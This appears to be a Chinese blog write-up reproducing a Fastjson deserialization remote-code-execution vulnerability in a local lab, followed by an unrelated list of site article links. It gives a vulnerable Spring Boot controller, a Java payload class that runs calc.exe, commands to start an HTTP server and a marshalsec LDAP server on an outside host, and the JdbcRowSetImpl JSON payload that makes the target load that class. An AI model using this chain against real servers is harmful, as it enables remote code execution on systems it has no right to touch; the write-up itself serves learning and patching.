记一次FastJson漏洞的复现
前言
Fastjson最经典的反序列漏洞是在1.2.24版本时,当时可以利用的主流方式有两种。
1.JNDI注入利用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中的_bytecodes属性进行整个恶意类的反序列化。
2.利用rmi或者ldap让服务器远程调用恶意类进行利用。
第一种方式fastjosn默认不会反序列私有属性,需要在反序列化时设置Feature.SupportNonPublicField这种方式才可以利用成功。
由于第一种方式受限制较多,很多情况下不会设置Feature.SupportNonPublicField,所以我们直接模拟下第二种方式。
准备事项
Python 2.7
Java jdk 1.8.0_101
marshalsec-0.0.3-SNAPSHOT-all.jar (https://github.com/mbechler/marshalsec) 模拟rmi或者ldap服务
springboot简单的代码准备
模拟服务端的准备(被攻击方)
一个超级简单的springboo服务,使用官方生成一个demo即可 https://start.spring.io/
加入fastjson的jar包,版本可以换,我特地用了一个比较低的版本
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.20</version>
</dependency>
加入一个简单的Controller
@RequestMapping("/hello")
public String say(@RequestBody String username) {
System.out.println(username);
Object Nuset=JSON.parseObject(username);
return "hello,this is a springboot demo!~";
}
相当简单代码,接收参数,然后使用FastJson的parseObject去解析.到这里一个简单的模拟服务端完成.直接springboot启动即可.我实在本地启动,我是一台windows的开发机.
攻击准备
这里我用我的腾讯云主机作为rmi或ldap服务的发布方.
首先下载marshalsec-0.0.3-SNAPSHOT-all.jar (https://github.com/mbechler/marshalsec) 模拟rmi或者ldap服务,这是一个java的 maven项目 下载后 直接install 得到 jar包,上传到腾讯云主机服务器.
攻击代码准备
import java.lang.Runtime;
import java.lang.Process;
public class FastjsonPOC {
static {
try {
//因为模拟服务在本地的windows主机启动,所以,执行打开计算器的操作,模拟攻击者要做的事情
Process process = Runtime.getRuntime().exec("calc.exe");
process.waitFor();
} catch (Exception e) {
}
}
}
将此代码本地编译后得到class文件,既FastjsonPOC.class,上传到上传到腾讯云主机服务器.
防火墙放开9090和9091端口
自带的python开始9090的http端口
python -m SimpleHTTPServer 9090
执行以下命令(jdk我就默认你有了哈!)开启rmi服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xxx.xxx:9090/#FastjsonPOC 9091
开干
好了,万事俱备了......
用PostMan或其他http模拟工具,朝模拟服务端的接口发送以下报文:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://xx.xx.xxx.xxx:9091/FastjsonPOC",
"autoCommit":true
}
}
可以看到计算器被打开了.............
结语
凶残!!!!!!!!!!!!!,以前写代码时,没注意这些漏洞提示,现在真实的体验到了,就两个字,凶残.......漏洞修复要及时才行啊!
- js小技巧:tab页切换
- c#字符串操作方法实例
- Android中Fragment+ViewPager的配合使用
- 结合机器学习与生物医学技术,寻找Uber司机出行模式
- ASP.NET MVC 4 - 测试驱动 ASP.NET MVC
- LVS+Keepalived高可用环境部署梳理(主主和主从模式)
- 随着区块链的火爆,相关顶级域名“矿池”KC.com已建站
- Flash/Flex学习笔记(50):3D线条与填充
- LVM常规操作记录梳理(扩容/缩容/快照等)
- Flash/Flex学习笔记(55):背面剔除与 3D 灯光
- 资源等待类型sys.dm_os_wait_stats
- NVIDIA不再允许数据中心用GeForce驱动,提供区块链服务除外
- 非常强悍并实用的双机热备+负载均衡线上方案
- Apache 压力测试工具ab
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 【教程】制作高品质铃声,苹果/安卓通用
- 【iOS】应用多开教程
- ggplot2画KEGG富集柱形图
- Go语言函数间传递切片的问题
- Go语言函数间传递数组的问题
- Kubernetes v1.8 对 GPU 的支持
- 【教程】checkra1n越狱教程+常用插件推荐
- 【教程】抓取网页内视频的五种方法
- 了解 Anaconda
- 【实用】教你识别下载“全家桶”
- 【iOS】修改checkra1n+chimera环境(chimera1n)
- 在 istio 中限制 namespace 访问外部资源
- 【iOS】浅析近期越狱工具+“平刷”工具
- XGBoost Operator源码分析
- 【杂货】制作checkra1n启动盘思路